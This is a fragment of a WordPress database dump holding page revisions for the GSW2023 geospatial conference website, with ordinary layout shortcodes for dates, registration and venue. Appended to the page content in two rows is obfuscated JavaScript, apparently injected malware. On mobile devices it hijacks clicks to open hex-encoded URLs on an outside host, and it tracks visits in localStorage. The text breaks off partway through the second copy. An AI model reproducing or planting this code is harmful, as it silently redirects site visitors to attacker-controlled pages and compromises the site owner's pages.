_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:21:33','2022-11-09 20:21:33','',3066,'https://gsw2023.com/?p=3213',0,'revision','',0),
(3214,1,'2022-11-09 20:23:54','2022-11-09 20:23:54','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_align=\"left\" title_size=\"h3\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 